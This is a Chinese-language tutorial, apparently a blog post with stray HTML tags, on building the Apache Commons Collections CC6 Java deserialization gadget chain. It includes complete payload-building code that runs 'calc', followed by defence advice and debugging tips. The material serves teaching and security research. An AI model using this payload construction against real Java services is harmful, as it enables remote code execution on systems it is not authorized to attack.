Java反序列化漏洞：CC6链构造过程详解<\/h1>

1. CC6链概述<\/h2>
CC6链是Apache Commons Collections反序列化漏洞利用链的一种变体，它基于CC1链进行改进，主要解决了CC1链在高版本Java中的限制问题。CC6链的核心在于利用`TiedMapEntry<\/code>类和HashMap<\/code>的反序列化过程来触发恶意代码执行。<\/p>`

2. 关键类与原理<\/h2>
2.1 核心类分析<\/h3>

HashMap<\/strong>：在反序列化时会调用readObject<\/code>方法，该方法会调用键对象的hashCode<\/code>方法<\/li>
TiedMapEntry<\/strong>：该类有一个hashCode<\/code>方法，在方法中会调用getValue<\/code>，进而调用map.get(key)<\/code><\/li>
LazyMap<\/strong>：与CC1相同，当调用get<\/code>方法时，如果没有对应的键，会调用Transformer<\/code>链<\/li>
<\/ul>
2.2 触发流程<\/h3>

HashMap反序列化时调用readObject<\/code><\/li>
readObject<\/code>调用键对象的hashCode<\/code>方法<\/li>
如果键是TiedMapEntry<\/code>，则调用其hashCode<\/code>方法<\/li>
TiedMapEntry.hashCode()<\/code>调用getValue()<\/code><\/li>
getValue()<\/code>调用map.get(key)<\/code><\/li>
如果map是LazyMap且key不存在，则触发Transformer链<\/li>
<\/ol>
3. 构造过程详解<\/h2>
3.1 基础构造（有问题的版本）<\/h3>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>}),<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>final<\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span>"xxx"<\/span>);<\/span>
<\/span><\/span>final<\/span> Map lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> chainedTransformer);<\/span>
<\/span><\/span>final<\/span> TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazymap,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map2.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span>"bbb"<\/span>);<\/span>
<\/span><\/span>serialize(<\/span>map2);<\/span>
<\/span><\/span><\/code><\/pre>问题<\/strong>：在map2.put<\/code>时就触发了命令执行，因为put<\/code>操作会立即调用hashCode<\/code><\/p>
3.2 改进版本（延迟触发）<\/h3>
\/\/ 同样的Transformer数组
<\/span><\/span><\/span><\/span>final<\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span>"xxx"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 关键修改：先使用无害的ConstantTransformer
<\/span><\/span><\/span><\/span>final<\/span> Map lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>final<\/span> TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazymap,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map2.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span>"bbb"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过反射替换为恶意Transformer
<\/span><\/span><\/span><\/span>Class lazymapClass =<\/span> LazyMap.<\/span>class<\/span>;<\/span>
<\/span><\/span>final<\/span> Field factory =<\/span> lazymapClass.<\/span>getDeclaredField<\/span>(<\/span>"factory"<\/span>);<\/span>
<\/span><\/span>factory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>factory.<\/span>set<\/span>(<\/span>lazymap,<\/span> chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>serialize(<\/span>map2);<\/span>
<\/span><\/span><\/code><\/pre>问题<\/strong>：反序列化时没有触发，因为lazymap<\/code>中已经有了"aaa"键<\/p>
3.3 最终正确版本<\/h3>
\/\/ Transformer数组同上
<\/span><\/span><\/span><\/span>final<\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span>"xxx"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用无害Transformer初始化
<\/span><\/span><\/span><\/span>final<\/span> Map lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>final<\/span> TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazymap,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map2.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span>"bbb"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 关键修复：移除"aaa"键，确保后续get会触发Transformer
<\/span><\/span><\/span><\/span>lazymap.<\/span>remove<\/span>(<\/span>"aaa"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射替换为恶意Transformer
<\/span><\/span><\/span><\/span>Class lazymapClass =<\/span> LazyMap.<\/span>class<\/span>;<\/span>
<\/span><\/span>final<\/span> Field factory =<\/span> lazymapClass.<\/span>getDeclaredField<\/span>(<\/span>"factory"<\/span>);<\/span>
<\/span><\/span>factory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>factory.<\/span>set<\/span>(<\/span>lazymap,<\/span> chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>serialize(<\/span>map2);<\/span>
<\/span><\/span>Deserialize(<\/span>"cc6.ser"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4. 关键点总结<\/h2>

延迟触发机制<\/strong>：使用无害的ConstantTransformer<\/code>初始化，避免put<\/code>时立即执行<\/li>
反射修改<\/strong>：通过反射在对象构造完成后替换为恶意Transformer<\/li>
键清理<\/strong>：必须移除测试时使用的键，确保反序列化时get<\/code>会触发Transformer链<\/li>
触发顺序<\/strong>：

HashMap反序列化 → hashCode调用<\/li>
TiedMapEntry.hashCode → getValue → map.get<\/li>
LazyMap.get → Transformer链执行<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御建议<\/h2>

升级Apache Commons Collections到最新安全版本<\/li>
使用Java反序列化过滤器(ObjectInputFilter)<\/li>
避免反序列化不可信数据<\/li>
考虑使用替代的序列化格式(如JSON)<\/li>
<\/ol>
6. 调试技巧<\/h2>

在put<\/code>操作前后检查lazymap<\/code>的内容<\/li>
跟踪hashCode<\/code>和get<\/code>方法的调用栈<\/li>
使用条件断点检查Transformer的替换过程<\/li>
验证反序列化时的键是否存在<\/li>
<\/ol>
通过这种构造方式，CC6链成功绕过了高版本Java中对CC1链的限制，展示了反序列化漏洞利用的灵活性。理解这种构造过程对于防御类似的攻击模式具有重要意义。<\/p>